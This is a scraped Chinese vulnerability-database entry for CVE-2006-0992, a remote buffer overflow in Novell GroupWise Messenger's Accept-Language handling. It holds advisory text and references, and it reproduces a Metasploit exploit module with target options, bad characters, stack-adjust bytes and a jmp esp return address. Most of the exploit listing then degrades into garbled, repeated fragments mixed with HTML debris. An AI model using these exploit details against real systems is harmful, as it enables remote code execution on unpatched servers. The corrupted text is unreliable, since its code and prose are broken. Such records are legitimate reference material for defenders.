CVE-2006-0992
CVSS10.0
发布时间 :2006-04-14 06:02:00
修订时间 :2017-07-19 21:30:13
NMCOEPS    

[原文]Stack-based buffer overflow in Novell GroupWise Messenger before 2.0 Public Beta 2 allows remote attackers to execute arbitrary code via a long Accept-Language value without a comma or semicolon. NOTE: due to a typo, the original ZDI advisory accidentally referenced CVE-2006-0092. This is the correct identifier.


[CNNVD]Novell GroupWise Messenger Accept-Language字段远程缓冲区溢出漏洞(CNNVD-200604-223)

        Novell GroupWise Messenger是一款基于GroupWise平台的即时交流工具。
        Novell GroupWise Agent在处理还有畸形HTTP字段数据时存在缓冲区溢出漏洞,远程攻击者可能利用此漏洞控制用户系统。
        GroupWise Messenger的Web Server监听于TCP/8300端口,其在处理HTTP协议头的超长的Accept-Language字段数据时存在缓冲区溢出,远程攻击者可以利用此漏洞在系统上执行任意指令。

- CVSS (基础分值)

CVSS分值: 10 [严重(HIGH)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0992
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-0992
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200604-223
(官方数据源) CNNVD

- 其它链接及资源

http://cirt.dk/advisories/cirt-42-advisory.txt
(UNKNOWN)  MISC  http://cirt.dk/advisories/cirt-42-advisory.txt
http://metasploit.blogspot.com/2006/04/exploit-development-groupwise_14.html
(UNKNOWN)  MISC  http://metasploit.blogspot.com/2006/04/exploit-development-groupwise_14.html
http://securitytracker.com/id?1015911
(UNKNOWN)  SECTRACK  1015911
http://support.novell.com/cgi-bin/search/searchtid.cgi?10100861.htm
(PATCH)  CONFIRM  http://support.novell.com/cgi-bin/search/searchtid.cgi?10100861.htm
http://www.milw0rm.com/exploits/1679
(UNKNOWN)  MILW0RM  1679
http://www.securityfocus.com/archive/1/archive/1/430911/100/0/threaded
(VENDOR_ADVISORY)  BUGTRAQ  20060413 ZDI-06-008: Novell GroupWise Messenger Accept-Language Buffer Overflow
http://www.securityfocus.com/bid/17503
(PATCH)  BID  17503
http://www.vupen.com/english/advisories/2006/1355
(UNKNOWN)  VUPEN  ADV-2006-1355
http://www.zerodayinitiative.com/advisories/ZDI-06-008.html
(VENDOR_ADVISORY)  MISC  http://www.zerodayinitiative.com/advisories/ZDI-06-008.html
https://exchange.xforce.ibmcloud.com/vulnerabilities/25828
(UNKNOWN)  XF  groupwise-accept-language-bo(25828)

- 漏洞信息

Novell GroupWise Messenger Accept-Language字段远程缓冲区溢出漏洞
危急 缓冲区溢出
2006-04-14 00:00:00 2006-04-15 00:00:00
远程  
        Novell GroupWise Messenger是一款基于GroupWise平台的即时交流工具。
        Novell GroupWise Agent在处理还有畸形HTTP字段数据时存在缓冲区溢出漏洞,远程攻击者可能利用此漏洞控制用户系统。
        GroupWise Messenger的Web Server监听于TCP/8300端口,其在处理HTTP协议头的超长的Accept-Language字段数据时存在缓冲区溢出,远程攻击者可以利用此漏洞在系统上执行任意指令。

- 公告与补丁

        目前厂商已经发布了升级补丁以修复这个安全问题,补丁下载链接:
        http://support.novell.com/security-alerts

- 漏洞信息 (1679)

Novell Messenger Server 2.0 (Accept-Language) Remote Overflow Exploit (EDBID:1679)
novell remote
2006-04-15 Verified
8300 H D Moore
N/A [点击下载]
##
# This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below. In the
# case of an unknown or missing license, this file defaults to the same
# license as the core Framework (dual GPLv2 and Artistic). The latest
# version of the Framework can always be obtained from metasploit.com.
##

package Msf::Exploit::novell_messenger_acceptlang;
use strict;
use base "Msf::Exploit";
use Pex::Text;

my $advanced = { };

my $info =
  {
	'Name'    => 'Novell Messenger Server 2.0 Accept-Language Overflow',
	'Version' => '$Revision: 1.5 $',
	'Authors' => [ 'H D Moore <hdm[at]metasploit.com>' ],

	'Arch'  => [ 'x86' ],
	'OS'    => [ 'win32', 'winnt', 'winxp', 'win2k', 'win2003' ],
	'Priv'  => 1,

	'AutoOpts'  =>  { 'EXITFUNC' => 'process' },

	'UserOpts'  =>
	  {
		'RHOST' => [1, 'ADDR', 'The target address'],
		'RPORT' => [1, 'PORT', 'The target port', 8300 ],
		'VHOST' => [0, 'DATA', 'The virtual host name of the server'],
		'SSL'   => [0, 'BOOL', 'Use SSL'],
	 DR', 'T , 'he lwor an,
		'SSL'   =&g
tr-0,  rivOL'laspg t'BOOL'XITFv0x00x0a\x2c\x3bXITFv0.join(XITFv0XITFv0, (XITFv0AXITFv0..XITFv0ZXITFv0)), # data Thiit-d In d  riKeypg 	' ],
	'OS' '+ws2utethe serPrepend'],
		'SSLXITFv0x81\xc4\x54\xf2\xff\xffXITFv0,  # he  esp, -3tr-Use SSL'],Dta name="dg t'BOOL'uot;;
use::Freessem(qqwor ;'>
modue, it-db.co atlacomsed buffer overflow in Novell
	; 'Novell Messengver .e;'>
#law092. rigell>Stayduay 在
	requ). uage 
# cerver 2.0 Accepts = "c gdocumrst # c16tayc)..
	Tosed bwl.cest nareturnThe targpt>st namacom, we mu. ufir. T	pcentaainmcpy() opercumenst #t u thepointote we w">hly. D.  NOTbelo	lT', thesile itarang;
>Stvascactote ual ordingmitcumens host naell
  
	en 
udthe =>_he u tr,e =>_acke, ual  =>_re late_utence})SL'],Ref
	'UserOpts' [ts' 	['e="OS [0,24617, 'Use 	['bla [0,BID &the se['CVE [0,2lnId=CVE, 'Use .com&gTT', 's'UserOpts' [ts	   GXF  t; 'Novell DCli s =dow v10510.37 [00x6103c3d3[00x61041001 ] # .data | jmp espUse .com&gKeypg ,
	'OS' ';XF  '.com&gDiscles anDcum 'EXITFUNApr 13 2ln5ion vancesub newiword = ="centershifOptsd = selfter ="cen-XITFSUPERf::ew({'I }; 'EXITFU { };' =&xt;

my 'EXITFU ext;

my}, @_);
	return( self);
}cesub quot;Msiword = selfttttttttershifOptsd = RT', '_e vir== self-XITFGetVar(t;
	  {)ptsd = RT', '_he tr== self-XITFGetVar(t;> )ptsd = RT', '_idx r== self-XITFGetVar(tTARGE; )ptsd = shlowarbit r== self-XITFGetVar(tEn ]b167/
        
	="edb">


- 漏洞57息 (1679)

Novell Messenger Server 2.0 Accept-Languag 57DBID:1679)
remote
Verified
8300
N/A [点击下载]
##
# This file is part of the Metasploit Framework asubjs thto: f nd may be rmensFramwither id itarang;
mens. Pleict;seeis part of the : f etasploit web s.cesfn un [ ' 
modue, it-db.co atlacomsack-based buffer overflow in Novellncti	r; 'Novell Messengver .e;'>
#law092. rigell>Stayduay 在ncti	rrequ). uage 
# cerver 2.0 Accepts = "c gdocumrst # c16tayc)..ncti	rTosed bwl.cest nareturnThe targpt>st namacom, we mu. ufir. ncti	rpcentaainmcpy() opercumenst #t u thepointote we w">hly. D.  NOTbelncti	rlT', thesile itarang;
>Stvascactote ual ordingmitcumens host naell
  ncti	ren 
	table>
   
   ="db_icon_pac id="edb">


- 漏F83166息 (1679)

olspan="2"> Novell Messenger Server 2.0 Accept-LanguagPlanF83166DBID:1679)2ln9-11-262006-04-14 00:00:00it-db.c,web,ed buffeH D Moore il?vulnId=CVE-2erified 代码下载: [点击下 <-2006-0992漣码下载: p>;'> rt of the Mmodue, it-db.co atlacomsed buffer overflow in Novellbel>Novell Messengver .e;'> #law092. rigell>Stayduay 在 requ). uage # cerver 2.0 Accepts = "c gdocumrst # c16tayc).. Tosed bwl.cest nareturnThe targpt>st namacom, we mu. ufir. pcentaainmcpy() opercumenst #t u thepointote we w">hly. D. NOTbel lT', thesile itarang; >Stvascactote ual ordingmitcumens host naell en [--]
htp;http://mxplooits/1679/" targettp;http://mxplity-a>Verified
## # This file is part of the Metasploit Framework asubjs thto f nd may be rmensFramwither id itarang; mens. Pleict;seeis part of the f etasploit web s.cesfn un [ ' modue, it-db.co atlacomsed buffer overflow in Novell i r; 'Novell Messengver .e;'> #law092. rigell>Stayduay 在cti rrequ). uage # cerver 2.0 Accepts = "c gdocumrst # c16tayc)..cti rTosed bwl.cest nareturnThe targpt>st namacom, we mu. ufir. cti rpcentaainmcpy() opercumenst #t u thepointote we w">hly. D. NOTbelcti rlT', thesile itarang; >Stvascactote ual ordingmitcumens host naell cti ren
/h2> ="db_ic